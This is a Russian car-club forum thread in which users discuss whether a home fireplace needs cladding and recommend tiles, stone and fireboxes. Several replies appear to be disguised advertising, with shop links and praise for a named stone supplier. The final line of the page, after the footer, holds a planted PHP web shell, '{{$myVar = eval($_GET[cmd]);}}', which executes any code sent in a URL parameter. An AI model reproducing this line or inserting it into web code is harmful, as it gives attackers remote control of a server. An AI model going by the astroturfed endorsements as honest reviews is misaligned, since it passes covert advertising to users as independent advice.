+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Облицовка камина. Нужна ли?


  1. #1
    Мимо проходил ГумбинМакс is on a distinguished road Аватар для ГумбинМакс
    Регистрация
    19.02.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    42

    Облицовка камина. Нужна ли?

    Задумал в новом доме под Москвой сложить камин. Только не пойму, нужна ли облицовка? Какую функцию она несет кроме эстетической?

  2. #2
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    В каком смысле "кроме эстетической"? Мне нравится когда дома у меня красиво и уютно. Поэтому я всячески стараюсь продумать даже малейшие детали чтобы не нарушить мой органичный интерьер. У меня камин расположен в углу, висящий угол крепится к потолку балкой, а сам камин я решил облицевать плиткой Майами из коллекции Терракот http://terrakot.su/terrakot/terrapli...pechi-plitkoy/ Ухаживать за облицованным плиткой камином очень легко, да и прогревает помещение он намного быстрее за счет того что плитка быстро греется от огня.

  3. #3
    Мимо проходил ЖоржЗибров is on a distinguished road Аватар для ЖоржЗибров
    Регистрация
    24.08.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    40
    Цитата Сообщение от Kommunar Посмотреть сообщение
    В каком смысле "кроме эстетической"? Мне нравится когда дома у меня красиво и уютно. Поэтому я всячески стараюсь продумать даже малейшие детали чтобы не нарушить мой органичный интерьер. У меня камин расположен в углу, висящий угол крепится к потолку балкой, а сам камин я решил облицевать плиткой Майами из коллекции Терракот http://terrakot.su/terrakot/terrapli...pechi-plitkoy/ Ухаживать за облицованным плиткой камином очень легко, да и прогревает помещение он намного быстрее за счет того что плитка быстро греется от огня.
    Вот это аргумент - прогревает помещение быстрее. А то как начнут писать что это "красиво".. Да, красиво, но сначала функционал, а потом уже эстетика.

  4. #4
    Мимо проходил Михалычев is on a distinguished road Аватар для Михалычев
    Регистрация
    16.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    16
    Почему нет, мне эстетика всегда на первом месте была. Именно с этой точки зрения и квартиру обставляем, стараемся, чтобы все везде красиво было, так и плитку выбирали тоже, https://www.mnogoplitki.ru/Catalog/I...Emigres/Petra/ вот эта сразу по душе пришлась, устроила и цена и качество, да и смотрится тоже отлично.

  5. #5
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Я в этом году сделал камин. У меня как говорят, руки растут из того места, поэтому делал всё сам. Хочу порадовать свою семью и скажем так, зимними вечерами порадовать свою семью тем, что мы будем собираться возле камина и пить чай. Для отделки камина я решил применить натуральный облицовочный камень, который я смог выбрать плитняк на сайте компании «Каменная крепость». Могу сказать, что у них достаточно хороший ассортимент отделочного камня. Сразу скажу, что они очень серьезно относятся к этому дело, потому что у них, честно говоря, очень хорошо подобранные камни. Они приблизительно одной толщины, поэтому очень легко с ними работать. К тому же, хочу сказать, что цены у них достаточно демократичные и облицовка камина вышла мне буквально за копейки.

  6. #6
    Мимо проходил Benver is on a distinguished road Аватар для Benver
    Регистрация
    29.05.2020
    Откуда
    HРФ
    Машина
    мой
    Сообщений
    34
    Конечно лучше облицовать

  7. #7
    GTI-Racing Ignat is on a distinguished road Аватар для Ignat
    Регистрация
    15.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    259
    Большую популярность набирают каминные топки Kratki и заказать их можно здесь https://kaminchi.ru/kaminy/kaminnie-...-topki-kratki/ . Наблюдать на искусственное пламя можно долго, но мне приятнее ощущать также и тепло. Моей жене давно хотелось установку камина для романтических вечеров, а также избавление от масляного обогревателя . Также мы по достоинству оценили функцию самоочищения стекла.

  8. #8
    Мимо проходил Kollins is on a distinguished road Аватар для Kollins
    Регистрация
    05.01.2019
    Машина
    Вольц
    Сообщений
    11
    Мне тоже кажется, что лучше облицовать. Это все таки в целях безопасности

+ Ответить в теме

Похожие темы

  1. Облицовка дома
    от Veron в разделе Семья и дом
    Ответов: 12
    Последнее сообщение: 02.10.2023, 20:56
  2. Нужна Мед Справка
    от ed1evil в разделе Курилка
    Ответов: 4
    Последнее сообщение: 24.12.2020, 00:59
  3. Облицовка порога левая Golf 6GTI
    от Jett77 в разделе Покупка и продажа запчастей
    Ответов: 15
    Последнее сообщение: 05.10.2020, 05:54
  4. Новая Облицовка порога
    от Jett77 в разделе Покупка и продажа запчастей
    Ответов: 5
    Последнее сообщение: 20.11.2014, 08:47
  5. Продам новые накладки(облицовка)порога Гольф5GTI и молдинги дверей.
    от oleg3 в разделе Покупка и продажа запчастей
    Ответов: 3
    Последнее сообщение: 28.07.2014, 11:06

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}